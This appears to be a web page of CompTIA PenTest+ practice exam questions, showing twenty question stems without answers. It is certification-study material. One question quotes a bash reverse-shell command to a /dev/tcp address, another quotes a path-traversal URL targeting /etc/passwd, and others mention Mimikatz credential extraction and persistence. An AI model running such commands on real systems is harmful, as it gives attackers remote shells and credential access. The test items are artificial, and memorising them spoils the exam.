Exam 12: CompTIA PenTest+ Certification Exam

arrow
  • Select Tags
search iconSearch Question
flashcardsStudy Flashcards
  • Select Tags

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

(Multiple Choice)
4.8/5
(43)

Which of the following commands starts the Metasploit database?

(Multiple Choice)
4.8/5
(29)

A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?

(Multiple Choice)
4.8/5
(33)

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

(Multiple Choice)
4.9/5
(47)

A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

(Multiple Choice)
5.0/5
(39)

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

(Multiple Choice)
4.9/5
(38)

An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment. During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the following actions should the penetration tester take?

(Multiple Choice)
4.9/5
(40)

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

(Multiple Choice)
4.8/5
(37)

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

(Multiple Choice)
4.7/5
(39)

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

(Multiple Choice)
4.9/5
(45)

A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two.)

(Multiple Choice)
4.8/5
(36)

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

(Multiple Choice)
4.9/5
(39)

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials.

(Multiple Choice)
4.9/5
(42)

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

(Multiple Choice)
4.9/5
(36)

When performing compliance-based assessments, which of the following is the MOST important key consideration?

(Multiple Choice)
4.8/5
(32)

An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?

(Multiple Choice)
4.7/5
(37)

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd Which of the following attack types is MOST likely to be the vulnerability?

(Multiple Choice)
4.9/5
(45)

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; done Which of the following BEST describes the result of running this command?

(Multiple Choice)
4.9/5
(33)

In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?

(Multiple Choice)
4.9/5
(35)

A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

(Multiple Choice)
4.8/5
(41)
Showing 41 - 60 of 165
close modal

Filters

  • Essay(0)
  • Multiple Choice(0)
  • Short Answer(0)
  • True False(0)
  • Matching(0)